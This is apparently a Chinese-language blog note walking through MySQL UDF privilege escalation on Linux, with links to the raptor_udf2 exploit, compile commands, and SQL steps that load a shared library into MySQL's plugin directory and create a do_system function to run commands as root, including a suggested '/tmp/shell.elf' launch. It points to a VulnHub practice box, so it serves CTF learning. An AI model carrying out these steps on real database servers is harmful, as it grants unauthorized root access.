Linux 下 MySQL UDF 提权小记

实验环境:

    Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (x86_64) using readline 6.3

可用POC:

    https://0xdeadbeef.info/exploits/raptor_udf2.c

    https://www.exploit-db.com/exploits/1518/

提权步骤:

    * $ id

    * uid=500(raptor) gid=500(raptor) groups=500(raptor)

    * $ gcc -g -c raptor_udf2.c

    * $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

     (此处有坑,exploit-db中将 -Wl 写成-W1 导致编译失败,若在目标机器上编译失败时可在本机编译后上传)

    * $ mysql -u root -p

    * Enter password:

    * [...]

    * mysql# use mysql;

    * mysql# create table foo(line blob);

    * mysql# insert into foo values(load_file('/home/raptor/raptor_udf2.so'));

    * mysql# select * from foo into dumpfile '/usr/lib/raptor_udf2.so';

    (此处需要注意:动态库的放置位置为目标机器mysql插件路径,可用以下命令获取:show variables like "%plugin%";)

    * mysql# create function do_system returns integer soname 'raptor_udf2.so';

    * mysql# select * from mysql.func;

    * +-----------+-----+----------------+----------+

    * | name      | ret | dl            | type    |

    * +-----------+-----+----------------+----------+

    * | do_system |  2 | raptor_udf2.so | function |

    * +-----------+-----+----------------+----------+

    * mysql# select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');  

    (进行到此已可用root身份执行命令,替换id即可如:select do_system('/tmp/shell.elf'); 这将已root身份启动一个应用程序)

    (chown raptor.raptor 应按实际用户身份更改)

    * mysql# \! sh

    * sh-2.05b$ cat /tmp/out

    * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)

    * [...]

    */

参考文档:

    http://www.91ri.org/16540.html

    https://www.jianshu.com/p/5b34c1b6dee7

    https://www.youtube.com/watch?v=G52yT0Gv_zc

    http://www.hackingarticles.in/hack-the-raven-walkthrough-ctf-challenge/

练习题:

    https://www.vulnhub.com/entry/raven-1,256/

推荐阅读更多精彩内容